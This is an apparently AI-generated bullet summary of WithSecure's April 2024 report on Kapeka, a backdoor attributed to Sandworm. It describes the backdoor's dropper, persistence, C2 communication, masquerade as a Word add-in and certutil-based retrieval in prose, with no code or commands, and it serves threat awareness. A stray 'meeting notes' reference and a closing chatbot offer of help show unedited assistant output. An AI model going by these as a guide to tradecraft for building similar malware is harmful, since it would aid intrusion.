April 17, 2024 at 10:04AM
WithSecure’s report reveals the discovery of the new Kapeka backdoor, linked to Russian APT group Sandworm, targeting Eastern Europe since 2022. Microsoft identifies it as KnuckleTouch, describing its involvement in ransomware campaigns and multifunctional capabilities. The backdoor’s advanced features indicate APT-level activity, showing conceptual overlaps with GreyEnergy and Prestige.
Based on the meeting notes, the key takeaways are as follows:
– A previously undocumented backdoor called Kapeka has been observed in cyber attacks targeting Eastern Europe, specifically Estonia and Ukraine, since mid-2022. It is attributed to the Russia-linked advanced persistent threat (APT) group known as Sandworm.
– Kapeka is a flexible backdoor that serves as an early-stage toolkit for its operators and provides long-term access to the victim’s system. It includes a dropper designed to launch and execute a backdoor component on the infected host before removing itself, and can set up persistence as a scheduled task or autorun registry.
– Microsoft has described Kapeka as involved in multiple campaigns distributing ransomware and capable of various functions, such as stealing credentials, conducting destructive attacks, and granting remote access to the device.
– The backdoor is a Windows DLL written in C++ with an embedded command-and-control (C2) configuration for establishing contact with an actor-controlled server.
– Kapeka masquerades as a Microsoft Word add-in, communicates with its C2 using the WinHttp 5.1 COM interface, and utilizes JSON to send and receive information from its C2.
– It is also capable of updating its C2 configuration on-the-fly, and its features include reading and writing files, launching payloads, executing shell commands, and even upgrading and uninstalling itself.
– The exact method of propagation is unknown, but the dropper is retrieved from compromised websites using the certutil utility, indicating the use of a legitimate living-off-the-land binary (LOLBin) to orchestrate the attack.
– Kapeka has conceptual and configuration overlaps with previously disclosed families like GreyEnergy and Prestige, and it is likely a successor to GreyEnergy and a successor to BlackEnergy in Sandworm’s arsenal.
– The victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity likely of Russian origin.
Let me know if you need more information or any other assistance related to this topic.